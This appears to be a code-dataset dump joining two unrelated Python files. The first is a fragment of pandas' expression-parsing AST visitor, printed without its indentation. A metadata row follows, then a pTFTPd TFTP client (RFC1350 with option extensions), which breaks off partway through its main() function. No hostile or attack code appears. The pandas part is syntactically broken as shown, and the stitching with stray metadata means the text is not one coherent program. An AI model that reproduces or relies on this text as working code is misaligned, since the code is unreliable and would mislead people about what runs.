_base_supported_nodes = (_all_node_names - _unsupported_nodes) | _hacked_nodes
_msg = 'cannot both support and not support {0}'.format(_unsupported_nodes &
_base_supported_nodes)
assert not _unsupported_nodes & _base_supported_nodes, _msg
def _node_not_implemented(node_name, cls):
def f(self, *args, **kwargs):
raise NotImplementedError("{0!r} nodes are not "
"implemented".format(node_name))
return f
def disallow(nodes):
def disallowed(cls):
cls.unsupported_nodes = ()
for node in nodes:
new_method = _node_not_implemented(node, cls)
name = 'visit_{0}'.format(node)
cls.unsupported_nodes += (name,)
setattr(cls, name, new_method)
return cls
return disallowed
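# Illustrative effect of @disallow (sketch): decorating a visitor class with
# disallow(frozenset(['Lambda'])) installs a visit_Lambda method that raises
# NotImplementedError("'Lambda' nodes are not implemented") whenever a lambda
# appears in the parsed expression.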
def _op_maker(op_class, op_symbol):
def f(self, node, *args, **kwargs):
return partial(op_class, op_symbol, *args, **kwargs)
return f
_op_classes = {'binary': BinOp, 'unary': UnaryOp}
def add_ops(op_classes):
def f(cls):
for op_attr_name, op_class in compat.iteritems(op_classes):
ops = getattr(cls, '{0}_ops'.format(op_attr_name))
ops_map = getattr(cls, '{0}_op_nodes_map'.format(op_attr_name))
for op in ops:
op_node = ops_map[op]
if op_node is not None:
made_op = _op_maker(op_class, op)
setattr(cls, 'visit_{0}'.format(op_node), made_op)
return cls
return f
@disallow(_unsupported_nodes)
@add_ops(_op_classes)
class BaseExprVisitor(ast.NodeVisitor):
const_type = Constant
term_type = Term
binary_ops = _cmp_ops_syms + _bool_ops_syms + _arith_ops_syms
binary_op_nodes = ('Gt', 'Lt', 'GtE', 'LtE', 'Eq', 'NotEq', 'In', 'NotIn',
'BitAnd', 'BitOr', 'And', 'Or', 'Add', 'Sub', 'Mult',
None, 'Pow', 'FloorDiv', 'Mod')
binary_op_nodes_map = dict(zip(binary_ops, binary_op_nodes))
unary_ops = _unary_ops_syms
unary_op_nodes = 'UAdd', 'USub', 'Invert', 'Not'
unary_op_nodes_map = dict(zip(unary_ops, unary_op_nodes))
rewrite_map = {
ast.Eq: ast.In,
ast.NotEq: ast.NotIn,
ast.In: ast.In,
ast.NotIn: ast.NotIn
}
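    # Illustrative rewrite (sketch): per the map above, a comparison against
    # a list or string term such as `a == [1, 2, 3]` is turned into the
    # membership test `a in [1, 2, 3]` (and `!=` likewise becomes `not in`)
    # by _rewrite_membership_op below.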
def __init__(self, env, engine, parser, preparser=_preparse):
self.env = env
self.engine = engine
self.parser = parser
self.preparser = preparser
self.assigner = None
def visit(self, node, **kwargs):
if isinstance(node, string_types):
clean = self.preparser(node)
node = ast.fix_missing_locations(ast.parse(clean))
method = 'visit_' + node.__class__.__name__
visitor = getattr(self, method)
return visitor(node, **kwargs)
def visit_Module(self, node, **kwargs):
if len(node.body) != 1:
raise SyntaxError('only a single expression is allowed')
expr = node.body[0]
return self.visit(expr, **kwargs)
def visit_Expr(self, node, **kwargs):
return self.visit(node.value, **kwargs)
def _rewrite_membership_op(self, node, left, right):
op_instance = node.op
op_type = type(op_instance)
if is_term(left) and is_term(right) and op_type in self.rewrite_map:
left_list, right_list = map(_is_list, (left, right))
left_str, right_str = map(_is_str, (left, right))
if left_list or right_list or left_str or right_str:
op_instance = self.rewrite_map[op_type]()
if right_str:
self.env.remove_tmp(right.name)
name = self.env.add_tmp([right.value])
right = self.term_type(name, self.env)
if left_str:
self.env.remove_tmp(left.name)
name = self.env.add_tmp([left.value])
left = self.term_type(name, self.env)
op = self.visit(op_instance)
return op, op_instance, left, right
def _possibly_transform_eq_ne(self, node, left=None, right=None):
if left is None:
left = self.visit(node.left, side='left')
if right is None:
right = self.visit(node.right, side='right')
op, op_class, left, right = self._rewrite_membership_op(node, left,
right)
return op, op_class, left, right
def _possibly_eval(self, binop, eval_in_python):
return binop.evaluate(self.env, self.engine, self.parser,
self.term_type, eval_in_python)
def _possibly_evaluate_binop(self, op, op_class, lhs, rhs,
eval_in_python=('in', 'not in'),
maybe_eval_in_python=('==', '!=', '<', '>',
'<=', '>=')):
res = op(lhs, rhs)
if self.engine != 'pytables':
if (res.op in _cmp_ops_syms
and getattr(lhs, 'is_datetime', False)
or getattr(rhs, 'is_datetime', False)):
                # all datetime comparisons must be evaluated in python
                # because numexpr doesn't handle NaT well
return self._possibly_eval(res, self.binary_ops)
if res.op in eval_in_python:
# "in"/"not in" ops are always evaluated in python
return self._possibly_eval(res, eval_in_python)
elif self.engine != 'pytables':
if (getattr(lhs, 'return_type', None) == object
or getattr(rhs, 'return_type', None) == object):
# evaluate "==" and "!=" in python if either of our operands
# has an object return type
return self._possibly_eval(res, eval_in_python +
maybe_eval_in_python)
return res
def visit_BinOp(self, node, **kwargs):
op, op_class, left, right = self._possibly_transform_eq_ne(node)
return self._possibly_evaluate_binop(op, op_class, left, right)
def visit_Div(self, node, **kwargs):
truediv = self.env.scope['truediv']
return lambda lhs, rhs: Div(lhs, rhs, truediv)
def visit_UnaryOp(self, node, **kwargs):
op = self.visit(node.op)
operand = self.visit(node.operand)
return op(operand)
def visit_Name(self, node, **kwargs):
return self.term_type(node.id, self.env, **kwargs)
def visit_NameConstant(self, node, **kwargs):
return self.const_type(node.value, self.env)
def visit_Num(self, node, **kwargs):
return self.const_type(node.n, self.env)
def visit_Str(self, node, **kwargs):
name = self.env.add_tmp(node.s)
return self.term_type(name, self.env)
def visit_List(self, node, **kwargs):
name = self.env.add_tmp([self.visit(e).value for e in node.elts])
return self.term_type(name, self.env)
visit_Tuple = visit_List
def visit_Index(self, node, **kwargs):
return self.visit(node.value)
def visit_Subscript(self, node, **kwargs):
value = self.visit(node.value)
slobj = self.visit(node.slice)
result = pd.eval(slobj, local_dict=self.env, engine=self.engine,
parser=self.parser)
try:
# a Term instance
v = value.value[result]
except AttributeError:
# an Op instance
lhs = pd.eval(value, local_dict=self.env, engine=self.engine,
parser=self.parser)
v = lhs[result]
name = self.env.add_tmp(v)
return self.term_type(name, env=self.env)
def visit_Slice(self, node, **kwargs):
lower = node.lower
if lower is not None:
lower = self.visit(lower).value
upper = node.upper
if upper is not None:
upper = self.visit(upper).value
step = node.step
if step is not None:
step = self.visit(step).value
return slice(lower, upper, step)
def visit_Assign(self, node, **kwargs):
if len(node.targets) != 1:
raise SyntaxError('can only assign a single expression')
if not isinstance(node.targets[0], ast.Name):
raise SyntaxError('left hand side of an assignment must be a '
'single name')
if self.env.target is None:
raise ValueError('cannot assign without a target object')
try:
assigner = self.visit(node.targets[0], **kwargs)
except UndefinedVariableError:
assigner = node.targets[0].id
self.assigner = getattr(assigner, 'name', assigner)
if self.assigner is None:
raise SyntaxError('left hand side of an assignment must be a '
'single resolvable name')
return self.visit(node.value, **kwargs)
def visit_Attribute(self, node, **kwargs):
attr = node.attr
value = node.value
ctx = node.ctx
if isinstance(ctx, ast.Load):
# resolve the value
resolved = self.visit(value).value
try:
v = getattr(resolved, attr)
name = self.env.add_tmp(v)
return self.term_type(name, self.env)
except AttributeError:
# something like datetime.datetime where scope is overridden
if isinstance(value, ast.Name) and value.id == attr:
return resolved
raise ValueError("Invalid Attribute context {0}".format(ctx.__name__))
def visit_Call(self, node, side=None, **kwargs):
# this can happen with: datetime.datetime
if isinstance(node.func, ast.Attribute):
res = self.visit_Attribute(node.func)
elif not isinstance(node.func, ast.Name):
raise TypeError("Only named functions are supported")
else:
res = self.visit(node.func)
if res is None:
raise ValueError("Invalid function call {0}".format(node.func.id))
if hasattr(res, 'value'):
res = res.value
args = [self.visit(targ).value for targ in node.args]
if node.starargs is not None:
args += self.visit(node.starargs).value
keywords = {}
for key in node.keywords:
if not isinstance(key, ast.keyword):
raise ValueError("keyword error in function call "
"'{0}'".format(node.func.id))
keywords[key.arg] = self.visit(key.value).value
if node.kwargs is not None:
keywords.update(self.visit(node.kwargs).value)
return self.const_type(res(*args, **keywords), self.env)
def translate_In(self, op):
return op
def visit_Compare(self, node, **kwargs):
ops = node.ops
comps = node.comparators
# base case: we have something like a CMP b
if len(comps) == 1:
op = self.translate_In(ops[0])
binop = ast.BinOp(op=op, left=node.left, right=comps[0])
return self.visit(binop)
# recursive case: we have a chained comparison, a CMP b CMP c, etc.
left = node.left
values = []
for op, comp in zip(ops, comps):
new_node = self.visit(ast.Compare(comparators=[comp], left=left,
ops=[self.translate_In(op)]))
left = comp
values.append(new_node)
return self.visit(ast.BoolOp(op=ast.And(), values=values))
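    # Illustrative expansion (sketch): the recursive case above rewrites a
    # chained comparison like `1 < a <= 5` into the conjunction
    # `(1 < a) and (a <= 5)` before evaluation.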
def _try_visit_binop(self, bop):
if isinstance(bop, (Op, Term)):
return bop
return self.visit(bop)
def visit_BoolOp(self, node, **kwargs):
def visitor(x, y):
lhs = self._try_visit_binop(x)
rhs = self._try_visit_binop(y)
op, op_class, lhs, rhs = self._possibly_transform_eq_ne(node, lhs,
rhs)
return self._possibly_evaluate_binop(op, node.op, lhs, rhs)
operands = node.values
return reduce(visitor, operands)
_python_not_supported = frozenset(['Dict', 'Call', 'BoolOp', 'In', 'NotIn'])
_numexpr_supported_calls = frozenset(_reductions + _mathops)
@disallow((_unsupported_nodes | _python_not_supported) -
(_boolop_nodes | frozenset(['BoolOp', 'Attribute', 'In', 'NotIn',
'Tuple'])))
class PandasExprVisitor(BaseExprVisitor):
def __init__(self, env, engine, parser,
preparser=partial(_preparse, f=compose(_replace_locals,
_replace_booleans))):
super(PandasExprVisitor, self).__init__(env, engine, parser, preparser)
@disallow(_unsupported_nodes | _python_not_supported | frozenset(['Not']))
class PythonExprVisitor(BaseExprVisitor):
def __init__(self, env, engine, parser, preparser=lambda x: x):
super(PythonExprVisitor, self).__init__(env, engine, parser,
preparser=preparser)
class Expr(StringMixin):
def __init__(self, expr, engine='numexpr', parser='pandas', env=None,
truediv=True, level=0):
self.expr = expr
self.env = env or Scope(level=level + 1)
self.engine = engine
self.parser = parser
self.env.scope['truediv'] = truediv
self._visitor = _parsers[parser](self.env, self.engine, self.parser)
self.terms = self.parse()
@property
def assigner(self):
return getattr(self._visitor, 'assigner', None)
def __call__(self):
return self.terms(self.env)
def __unicode__(self):
return com.pprint_thing(self.terms)
def __len__(self):
return len(self.expr)
def parse(self):
return self._visitor.visit(self.expr)
@property
def names(self):
if is_term(self.terms):
return frozenset([self.terms.name])
return frozenset(term.name for term in com.flatten(self.terms))
_parsers = {'python': PythonExprVisitor, 'pandas': PandasExprVisitor}
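# Illustrative usage sketch (assumption -- the expression is hypothetical,
# and this mirrors how pandas.eval drives Expr internally):
#   env = Scope(level=1)          # capture the caller's variables
#   ex = Expr('a + b * 2', engine='numexpr', parser='pandas', env=env)
#   result = ex()                 # evaluate the parsed term tree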
| true
| true
|
1c40dcf9fed1df342a46112c9315c08080e2084f
| 25,926
|
py
|
Python
|
tftpclient.py
|
xdutaotao/flashboot
|
307f65af0cf5d8e6de04cc11916017d1f5d6a8a0
|
[
"Apache-2.0"
] | 1
|
2018-11-28T13:11:51.000Z
|
2018-11-28T13:11:51.000Z
|
tftpclient.py
|
xdutaotao/flashboot
|
307f65af0cf5d8e6de04cc11916017d1f5d6a8a0
|
[
"Apache-2.0"
] | null | null | null |
tftpclient.py
|
xdutaotao/flashboot
|
307f65af0cf5d8e6de04cc11916017d1f5d6a8a0
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# coding=utf-8
# Author: Maxime Petazzoni
# maxime.petazzoni@bulix.org
#
# This file is part of pTFTPd.
#
# pTFTPd is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# pTFTPd is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with pTFTPd. If not, see <http://www.gnu.org/licenses/>.
from __future__ import print_function
try:
# noinspection PyShadowingBuiltins
input = raw_input # Py2
except NameError:
pass # Py3
"""Simple TFTP client.
This is a very simple TFTP client that supports pull/push files from a
TFTP server. It fully supports the TFTP specification as defined in
RFC1350. It also supports the TFTP Option Extension protocol (per
RFC2347), the block size option as defined in RFC2348 and the transfer
size option from RFC2349.
Note that this program currently does *not* support the timeout
interval option from RFC2349.
"""
from datetime import datetime
import os
import shutil
import socket
import stat
import sys
import tempfile
import notify
import proto
import state
l = notify.getLogger('tftp')
# UDP datagram size
_UDP_TRANSFER_SIZE = 2**16
_PTFTP_DEFAULT_PORT = 69
_PTFTP_DEFAULT_HOST = 'localhost'
_PTFTP_DEFAULT_MODE = 'octet'
_PTFTP_DEFAULT_OPTS = {
proto.TFTP_OPTION_BLKSIZE: proto.TFTP_LAN_PACKET_SIZE,
proto.TFTP_OPTION_WINDOWSIZE: proto.TFTP_LAN_WINDOW_SIZE,
}
_PTFTP_RFC1350_OPTS = {
proto.TFTP_OPTION_BLKSIZE: proto.TFTP_DEFAULT_PACKET_SIZE,
}
# noinspection PyPep8Naming
class UDPMessageSocket(object):
"""A wrapper around a UDP datagram socket that provides per-message
    receive semantics.
This wrapper is very specific to the TFTP client use case. Messages are
    expected to be received one at a time, except for DATA messages, which may
come streaming when a window size greater than one is negotiated between
the client and the server. When that's the case, reading from the socket
returns more than one message but the client (and its state machine) still
expects to process them one at a time.
By utilizing the knowledge of the expected size of those DATA messages
(based on the negotiated block size) this wrapper slices the received data
accordingly to expose the desired one-at-a-time semantics.
"""
def __init__(self):
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.reset()
@property
def rport(self):
return self._rport
def settimeout(self, timeout):
self._sock.settimeout(timeout)
def send(self, message, peer):
self._sock.sendto(message, peer)
def reset(self):
self._buffer = None
self._rport = None
def close(self):
self._sock.close()
def recv(self, blksize):
if not self._buffer:
self._recv()
if not self._buffer:
return None
opcode = proto.TFTPHelper.get_opcode(self._buffer)
if opcode == proto.OP_DATA:
size = proto.TFTPHelper.get_data_size(blksize)
data, self._buffer = self._buffer[:size], self._buffer[size:]
else:
data, self._buffer = self._buffer, None
return data
def _recv(self):
(data, (address, port)) = self._sock.recvfrom(_UDP_TRANSFER_SIZE)
if not self._rport:
self._rport = port
elif port != self._rport:
# Ignore packets from other peers
return
self._buffer = data
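# --- illustrative sketch (not part of the original source) -----------------
# With a negotiated window size > 1 a single recvfrom() can return several
# back-to-back DATA messages. Assuming get_data_size(blksize) returns
# blksize + 4 (2-byte opcode + 2-byte block number), recv(512) slices one
# 516-byte DATA message off the front of the buffer per call:
#   sock = UDPMessageSocket()
#   first = sock.recv(512)   # first DATA message, read from the wire
#   second = sock.recv(512)  # second DATA message, from the buffered rest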
# noinspection PyPep8Naming
class TFTPClient(object):
"""
A small and simple TFTP client to pull/push files from a TFTP server.
"""
PTFTP_STATE = None
def __init__(self, peer, opts=None, mode='octet', rfc1350=False,
notification_callbacks=None):
"""
Initializes the TFTP client.
Args:
peer (tuple): a (host, port) tuple describing the server to connect
to.
            opts (dict): a dictionary of TFTP option values to use,
or None to disable them (defaults to None).
mode (string): the transfer mode to use by default, must be one of
TFTP_MODES (defaults to octet).
notification_callbacks (dict): a dictionary of notification
callbacks to use for the callback notification engine.
"""
if notification_callbacks is None:
notification_callbacks = {}
self.peer = peer
self.transfer_mode = mode
self.error = False
self.rfc1350 = rfc1350
self.opts = opts
if rfc1350:
self.opts = _PTFTP_RFC1350_OPTS
print('Running in RFC1350 compliance mode.')
else:
if not self.opts:
self.opts = _PTFTP_DEFAULT_OPTS
# This one is mandatory
if proto.TFTP_OPTION_BLKSIZE not in self.opts:
self.opts[proto.TFTP_OPTION_BLKSIZE] = \
_PTFTP_DEFAULT_OPTS[proto.TFTP_OPTION_BLKSIZE]
# Finally, install the provided callbacks
notify.CallbackEngine.install(l, notification_callbacks)
def connect(self):
"""
        Connects the socket to the remote host. Because TFTP is a UDP
        protocol, this has practically no effect.
Args:
None.
"""
self.sock = UDPMessageSocket()
self.sock.settimeout(state.STATE_TIMEOUT_SECS)
print('Connected to {}:{}.'.format(self.peer[0], self.peer[1]))
def finish(self):
"""
Closes the connection with the server.
Args:
None.
"""
self.sock.close()
def serve_forever(self):
"""
Serve the client prompt until the user exits the program.
Args:
None.
"""
self.connect()
while True:
print()
try:
command = input('tftp> ')
except EOFError:
print()
break
if not command:
continue
cmd_parts = command.split(' ')
if cmd_parts[0] in ('?', 'help'):
self.usage()
elif cmd_parts[0] in ('g', 'get'):
self.get(cmd_parts[1:])
elif cmd_parts[0] in ('p', 'put'):
self.put(cmd_parts[1:])
elif cmd_parts[0] in ('q', 'quit'):
break
elif cmd_parts[0] in ('m', 'mode'):
self.mode(cmd_parts[1:])
elif cmd_parts[0] in ('b', 'blksize'):
self.blksize(cmd_parts[1:])
elif cmd_parts[0] in ('w', 'windowsize'):
self.windowsize(cmd_parts[1:])
else:
print('Unrecognized command. Try help.')
self.finish()
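    # Illustrative interactive session (sketch; the file name is
    # hypothetical):
    #   tftp> blksize 1428
    #   tftp> get -f vmlinuz
    #   tftp> quit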
def usage(self):
"""
Display the client help to the user.
Args:
None.
"""
print('Available commands:')
print()
print('? help Display help')
print('q quit Quit the TFTP client')
print('m mode [newmode] Display or change transfer mode')
print('b blksize [newsize] Display or change the transfer block size')
print('w windowsize [newsize] Display or change the transfer window size')
print()
print('g get [-f] <filename> Get <filename> from server.')
print(' (use -f to overwrite local file)')
print('p put <filename> Push <filename> to the server')
print()
def handle(self):
"""
Handle an incoming TFTP packet and dispatch it to one of the
serve<op> methods below.
Args:
None.
"""
if not self.PTFTP_STATE:
self.error = (True, 'Connection state error.')
return
# Reset the error flag
self.error = False
self.sock.reset()
        # Process incoming packets until the state is cleared by the
        # end of a successful transmission or an error
while not self.PTFTP_STATE.done and not self.error:
try:
blksize = self.opts[proto.TFTP_OPTION_BLKSIZE]
request = self.sock.recv(blksize)
if not request:
continue
except socket.timeout:
self.error = (True, 'Connection timed out.')
return
if not self.PTFTP_STATE.tid:
self.PTFTP_STATE.tid = self.sock.rport
print('Communicating with {}:{}.'
.format(self.peer[0], self.PTFTP_STATE.tid))
# Reset the response packet
response = None
# Get the packet opcode and dispatch
opcode = proto.TFTPHelper.get_opcode(request)
if not opcode:
self.error = (True, None)
response = proto.TFTPHelper.createERROR(proto.ERROR_ILLEGAL_OP)
elif opcode not in proto.TFTP_OPS:
self.error = (True,
"Unknown or unsupported operation %d!" % opcode)
response = proto.TFTPHelper.createERROR(proto.ERROR_ILLEGAL_OP)
else:
try:
handler = getattr(self, "serve%s" % proto.TFTP_OPS[opcode])
response = handler(opcode, request[2:])
except AttributeError:
self.error = (True, 'Operation not supported.')
response = proto.TFTPHelper.createERROR(
proto.ERROR_UNDEF, 'Operation not supported.')
# Finally, send the response if we have one
if response:
peer = (self.peer[0], self.PTFTP_STATE.tid)
self.sock.send(response, peer)
def serveOACK(self, op, request):
"""
Serves OACK packets.
Args:
op (integer): the TFTP opcode.
request (string): the TFTP packet without its opcode.
Returns:
A response packet (as a string) or None if the request is
ignored or completed.
"""
try:
opts = proto.TFTPHelper.parseOACK(request)
except SyntaxError:
            # Ignore malformed OACK packets
return None
if not self.PTFTP_STATE:
return proto.TFTPHelper.createERROR(proto.ERROR_UNKNOWN_ID)
# Analyze received options
opts = proto.TFTPHelper.parse_options(opts)
if opts:
# HOOK: this is where we should check that we accept the
# options provided by the server (tsize/timeout/...).
self.PTFTP_STATE.set_opts(opts)
else:
self.error = (True, 'Transfer options parsing failed.')
self.PTFTP_STATE.state = state.STATE_ERROR
self.PTFTP_STATE.error = proto.ERROR_OPTION_NEGOCIATION
if self.PTFTP_STATE.state == state.STATE_RECV:
self.PTFTP_STATE.state = state.STATE_RECV_ACK
return self.PTFTP_STATE.next()
def serveACK(self, op, request):
"""
Serves ACK packets.
Args:
op (integer): the TFTP opcode.
request (string): the TFTP packet without its opcode.
Returns:
A response packet (as a string) or None if the request is
ignored or completed.
"""
try:
num = proto.TFTPHelper.parseACK(request)
except SyntaxError:
            # Ignore malformed ACK packets
return None
if not self.PTFTP_STATE:
return proto.TFTPHelper.createERROR(proto.ERROR_UNKNOWN_ID)
if self.PTFTP_STATE.state == state.STATE_SEND:
if self.PTFTP_STATE.packetnum != num:
self.error = (True,
'Got ACK with incoherent data packet number.')
self.PTFTP_STATE.state = state.STATE_ERROR
self.PTFTP_STATE.error = proto.ERROR_ILLEGAL_OP
if not self.rfc1350 and num >= proto.TFTP_PACKETNUM_MAX-1:
print('Packet number wraparound.')
return self.PTFTP_STATE.next()
elif self.PTFTP_STATE.state == state.STATE_SEND_LAST:
self.PTFTP_STATE.done = True
return None
print('ERROR: Unexpected ACK!')
self.error = (True, None)
return proto.TFTPHelper.createERROR(proto.ERROR_ILLEGAL_OP)
def serveDATA(self, op, request):
"""
Serves DATA packets.
Args:
op (integer): the TFTP opcode.
request (string): the TFTP packet without its opcode.
Returns:
A response packet (as a string) or None if the request is
ignored for some reason.
"""
try:
num, data = proto.TFTPHelper.parseDATA(request)
except SyntaxError:
# Ignore malformed DATA packets
return None
if not self.PTFTP_STATE:
return proto.TFTPHelper.createERROR(proto.ERROR_UNKNOWN_ID)
if len(data) > self.PTFTP_STATE.opts[proto.TFTP_OPTION_BLKSIZE]:
self.error = (True, None)
return proto.TFTPHelper.createERROR(proto.ERROR_ILLEGAL_OP)
if self.PTFTP_STATE.state == state.STATE_RECV:
if num != self.PTFTP_STATE.packetnum:
self.error = (True, 'Got DATA with incoherent packet number.')
self.PTFTP_STATE.state = state.STATE_ERROR
self.PTFTP_STATE.error = proto.ERROR_ILLEGAL_OP
else:
self.PTFTP_STATE.data = data
if not self.PTFTP_STATE.done and not self.rfc1350 and \
num >= proto.TFTP_PACKETNUM_MAX - 1:
print('Packet number wraparound.')
return self.PTFTP_STATE.next()
print('ERROR: Unexpected DATA!')
self.error = (True, None)
return proto.TFTPHelper.createERROR(proto.ERROR_ILLEGAL_OP)
def serveERROR(self, op, request):
"""
Serves ERROR packets.
Args:
op (integer): the TFTP opcode.
request (string): the TFTP packet without its opcode.
Returns:
A response packet (as a string) or None if the request is
ignored for some reason.
"""
try:
errno, errmsg = proto.TFTPHelper.parseERROR(request)
except SyntaxError:
# Ignore malformed ERROR packets
return None
# Clearing state
if self.PTFTP_STATE.op == proto.OP_RRQ:
self.PTFTP_STATE.purge()
self.error = (True, errmsg)
return None
def get(self, args):
"""
Implements the GET command to retrieve a file from the server.
Args:
args (list): the list of arguments passed to the command.
Returns:
True or False depending on the success of the operation.
"""
if len(args) < 1 or len(args) > 2:
print('Usage: get [-f] <filename>')
return False
filepath = args[0]
overwrite = False
if len(args) == 2:
filepath = args[1]
if args[0] == '-f':
overwrite = True
(_, filename) = os.path.split(filepath)
# First, check we're not going to overwrite an existing file
if not overwrite:
try:
open(filename)
print('Error: local file {} already exists!'.format(filename))
print('Use get -f to overwrite the local file.')
return False
except IOError:
pass
self.PTFTP_STATE = state.TFTPState(self.peer, proto.OP_RRQ,
'', filepath, self.transfer_mode,
not self.rfc1350)
# Then, before sending anything to the server, open the file
# for writing
try:
# We don't want tempfile to automatically delete the temporary
# file on close() as we have to copy its content to the destination
            # file first. We'll handle its deletion on our own.
self.PTFTP_STATE.file = tempfile.NamedTemporaryFile(delete=False)
self.PTFTP_STATE.packetnum = 1
self.PTFTP_STATE.state = state.STATE_RECV
except IOError as e:
print('Error: {}'.format(os.strerror(e.errno)))
print('Can\'t write to temporary file {}!'
.format(self.PTFTP_STATE.file.name))
return False
opts = dict(self.opts)
# When not running in RFC1350 compliance mode, append tsize: 0
# to the list of options in the request to get the requested
# file size back in the OACK.
if not self.rfc1350:
opts[proto.TFTP_OPTION_TSIZE] = 0
# Everything's OK, let's go
print("Retrieving '%s' from the remote host..." % filename)
packet = proto.TFTPHelper.createRRQ(filepath, self.transfer_mode, opts)
transfer_start = datetime.today()
self.sock.send(packet, self.peer)
self.handle()
transfer_time = datetime.today() - transfer_start
if self.error:
error, errmsg = self.error
if error and errmsg:
print('Error: {}'.format(errmsg))
            # Remove the temporary file on error. The destination file,
# if it already existed, is left untouched.
self.PTFTP_STATE.file.close()
os.remove(self.PTFTP_STATE.file.name)
return False
# Copy the temporary file to its final destination
try:
shutil.copy(self.PTFTP_STATE.file.name, filename)
except IOError as e:
print('Error: {}'.format(os.strerror(e.errno)))
print('Can\'t copy temporary file to local file {}!'
.format(filename))
return False
print('Transfer complete, {} bytes ({:.2f} kB/s)'
.format(self.PTFTP_STATE.filesize,
self.__get_speed(self.PTFTP_STATE.filesize,
transfer_time)))
self.PTFTP_STATE.file.close()
os.remove(self.PTFTP_STATE.file.name)
return True
def put(self, args):
"""
Implements the PUT command to push a file to the server.
Args:
args (list): the list of arguments passed to the command.
Returns:
True or False depending on the success of the operation.
"""
if len(args) != 1:
print('Usage: put <filename>')
return
filepath = args[0]
self.PTFTP_STATE = state.TFTPState(self.peer, proto.OP_WRQ,
'', filepath, self.transfer_mode,
not self.rfc1350)
try:
self.PTFTP_STATE.file = open(filepath, 'rb')
self.PTFTP_STATE.filesize = os.stat(filepath)[stat.ST_SIZE]
self.PTFTP_STATE.packetnum = 0
self.PTFTP_STATE.state = state.STATE_SEND
except IOError as e:
print('Error: {}'.format(os.strerror(e.errno)))
print('Can\'t read from local file {}!'.format(filepath))
return False
opts = dict(self.opts)
# When not running in RFC1350 compliance mode, append the
# tsize option to the request options to specify the
        # transferred file size to the server.
if not self.rfc1350:
opts[proto.TFTP_OPTION_TSIZE] = self.PTFTP_STATE.filesize
# Everything's OK, let's go
print("Pushing '%s' to the remote host..." % filepath)
packet = proto.TFTPHelper.createWRQ(filepath, self.transfer_mode, opts)
transfer_start = datetime.today()
self.sock.send(packet, self.peer)
self.handle()
transfer_time = datetime.today() - transfer_start
if self.error:
error, errmsg = self.error
if error and errmsg:
print('Error: {}'.format(errmsg))
return False
print('Transfer complete, {} bytes ({:.2f} kB/s)'
.format(self.PTFTP_STATE.filesize,
self.__get_speed(self.PTFTP_STATE.filesize,
transfer_time)))
return True
def mode(self, args):
if len(args) > 1:
print('Usage: mode [newmode]')
return
if not len(args):
print('Current transfer mode: {}.'.format(self.transfer_mode))
print('Available transfer modes: {}'
.format(', '.join(proto.TFTP_MODES)))
return
if args[0].lower() in proto.TFTP_MODES:
self.transfer_mode = args[0].lower()
print('Mode set to {}.'.format(self.transfer_mode))
else:
print('Unknown transfer mode, use one of: {}'
.format(', '.join(proto.TFTP_MODES)))
def blksize(self, args):
if len(args) > 1:
print('Usage: blksize [newsize]')
return
if not len(args):
print('Current block size: {} byte(s).'
.format(self.opts[proto.TFTP_OPTION_BLKSIZE]))
return
try:
self.opts[proto.TFTP_OPTION_BLKSIZE] = int(args[0])
print('Block size set to {} byte(s).'
.format(self.opts[proto.TFTP_OPTION_BLKSIZE]))
except ValueError:
print('Block size must be a number!')
def windowsize(self, args):
if len(args) > 1:
print('Usage: windowsize [newsize]')
return
if not len(args):
print('Current window size: {} packet(s).'
.format(self.opts[proto.TFTP_OPTION_WINDOWSIZE]))
return
try:
self.opts[proto.TFTP_OPTION_WINDOWSIZE] = int(args[0])
print('Window size set to {} packet(s).'
.format(self.opts[proto.TFTP_OPTION_WINDOWSIZE]))
except ValueError:
print('Window size must be a number!')
def __get_speed(self, filesize, time):
return (filesize / 1024.0 /
(time.seconds + time.microseconds / 1000000.0))
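# Illustrative numbers for __get_speed (sketch): a 1,048,576-byte transfer
# completed in 2.0 seconds yields 1048576 / 1024.0 / 2.0 == 512.0 kB/s.
# Programmatic usage sketch (host and file name are hypothetical):
#   client = TFTPClient(('192.168.0.10', 69))
#   client.connect()
#   client.get(['-f', 'vmlinuz'])
#   client.finish()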
def usage():
print("usage: %s [options]" % sys.argv[0])
print()
print(" -? --help Get help")
print(" -h --host <host> Set TFTP server (default: %s)" % _PTFTP_DEFAULT_HOST)
print(" -p --port <port> Define the port to connect to (default: %d)" % _PTFTP_DEFAULT_PORT)
print(" -m --mode <mode> Set transfer mode (default: %s)" % _PTFTP_DEFAULT_MODE)
print(" Must be one of:", ', '.join(proto.TFTP_MODES))
print()
print("Available extra options (using the TFTP option extension protocol):")
print(" -b --blksize <n> Set transfer block size (default: %d bytes)" % proto.TFTP_LAN_PACKET_SIZE)
print(" Must be between %d and %d" % (proto.TFTP_BLKSIZE_MIN, proto.TFTP_BLKSIZE_MAX))
print(" -w --windowsize <n> Set streaming window size (default: %d)" % proto.TFTP_LAN_WINDOW_SIZE)
print(" Must be between %d and %d" % (proto.TFTP_WINDOWSIZE_MIN, proto.TFTP_WINDOWSIZE_MAX))
print()
print("To disable the use of TFTP extensions:")
print(" -r --rfc1350 Strictly comply to the RFC1350 only (no extensions)")
print(" This will discard other TFTP option values.")
print()
def main():
# TODO: convert to optparse
import getopt
try:
opts, args = getopt.getopt(sys.argv[1:], '?h:p:b:w:m:r',
['help', 'host=',
'port=', 'blksize=',
'windowsize=', 'mode=',
'rfc1350'])
except getopt.GetoptError:
usage()
return 1
host = _PTFTP_DEFAULT_HOST
port = _PTFTP_DEFAULT_PORT
mode = _PTFTP_DEFAULT_MODE
exts = {}
rfc1350 = False
for opt, val in opts:
if opt in ('-?', '--help'):
usage()
return 0
if opt in ('-h', '--host'):
host = val
if opt in ('-p', '--port'):
try:
port = int(val)
except ValueError:
print('Port must be a number!')
return 2
if opt in ('-b', '--blksize'):
try:
exts[proto.TFTP_OPTION_BLKSIZE] = int(val)
except ValueError:
print('Block size must be a number!')
return 2
if opt in ('-w', '--windowsize'):
try:
exts[proto.TFTP_OPTION_WINDOWSIZE] = int(val)
except ValueError:
print('Window size must be a number!')
return 2
if opt in ('-m', '--mode'):
if val in proto.TFTP_MODES:
mode = val
else:
print('Transfer mode must be one of: {}'
.format(', '.join(proto.TFTP_MODES)))
return 2
